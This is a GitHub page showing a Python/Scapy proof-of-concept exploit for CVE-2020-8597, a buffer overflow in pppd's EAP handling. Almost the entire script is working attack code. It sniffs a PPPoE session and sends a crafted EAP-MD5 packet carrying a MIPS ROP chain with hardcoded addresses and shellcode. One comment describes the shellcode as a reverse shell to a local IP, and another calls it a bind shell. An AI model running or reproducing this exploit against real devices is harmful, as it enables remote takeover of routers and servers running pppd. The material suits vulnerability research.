-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathPoC.py
68 lines (61 loc) · 3.33 KB
/
PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
# https://github.com/paulusmack/ppp/commit/8d7970b8f3db727fe798b65f3377fe6787575426
# https://github.com/WinMin/CVE-2020-8597
# http://asm.sourceforge.net/syscall.html
from scapy.all import *
def packet_callback(packet):
global sessionid, src, dst
sessionid = int(packet['PPP over Ethernet'].sessionid)
src, dst = packet['Ethernet'].dst, packet['Ethernet'].src
print('src: ' + src)
print('dst: ' + dst)
print('sessionid: ' + str(sessionid))
def eap_rsp_md5():
'''
# Eth Src(48bits) Dst(48bits) Type(PPPoE Session)(0x8864)
pay = '\x11\x22\x33\x44\x55\x66\x11\x22\x33\x44\x55\x66\x88\x64' \
# PPPoE Version(4bits)(0x1) Type(4bits)(0x1) Code(SESSION=0x00) SessionID(16bits) PaylaodLength(16bits)
'\x11\x00\x00' + chr(sessionid) + '\x01\x18' \
# PPP (Extensible Authentication Protocol)(0xc227)
'\xc2\x27' \
# EAP Code(Request=0x01) ID(8bits) Length(16bits) Type(EAP-MD5-CHALLENGE=0x04)
'\x01\x83\x01\x16\x04' \
# EAP-MD5 ValueSize(8bits) Value
'\x10\x01\x12\x23\x34\x45\x56\x67\x78\x89\x9a\xab\xbc\xcd\xde\xef\xf0' \
'A'*0x100
'''
md5 = b'\x01\x12\x23\x34\x45\x56\x67\x78\x89\x9a\xab\xbc\xcd\xde\xef\xf0'
# cache incoherency
s0 = b"\x40\x61\xF1\x77" # libc 0006C140(sleep) 77F16140
s1 = b"\x01\x00\x00\x00"
s2 = b"\x66\x66\x66\x66"
s3 = b"\x00\x64\xFF\x7F" # 7ffd6000-7fff7000 rwxp [stack]
s4 = b"\x66\x66\x66\x66"
s5 = b"\x88\xe1\x40\x00" # move $a0,$s1 // jr(jmp) $s0 // pppd 0040E188
ra = b"\x14\xD0\xED\x77" # jalr(call) $s5 // jalr $s3 // libc 00033014 77EDD014
# https://www.anquanke.com/vul/id/1065300
# Reverse shell, connect to 192.168.31.111:1111
stg3_SC = b'\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28'
stg3_SC += b'\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01'
stg3_SC += b'\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01'
stg3_SC += b'\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01'
stg3_SC += b'\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24'
stg3_SC += b'\x0c\x09\x09\x01\x03\x57\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20' # 0357
stg3_SC += b'\xf8\xff\xa5\xaf\x1f\x6f\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf' # 1f6fc0a8
stg3_SC += b'\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24'
stg3_SC += b'\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf'
stg3_SC += b'\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28'
stg3_SC += b'\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23'
stg3_SC += b'\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28'
stg3_SC += b'\xab\x0f\x02\x24\x0c\x09\x09\x01'
rop_chain = b'A'*0x184 + s0 + s1 + s2 + s3 + s4 + s5 + ra
# Nop slide
rop_chain += b'\x00'*0x100
rop_chain += stg3_SC # enhex(asm(shellcraft.mips.linux.bindsh(9999),arch='mips'))
# Just padding the end a little, since the last byte gets set to 0x00 and not everyone uses a 4 * 0x00 as nop
rop_chain += b'\x00'*0x4
pay = Ether(dst=dst, src=src, type=0x8864)/PPPoE(code=0x00, sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100, value=md5, optional_name=rop_chain)
sendp(pay)
print(show_interfaces())
iface = IFACES.dev_from_index(input('index < '))
sniff(prn=packet_callback, iface=iface, filter='pppoes', count=1)
eap_rsp_md5()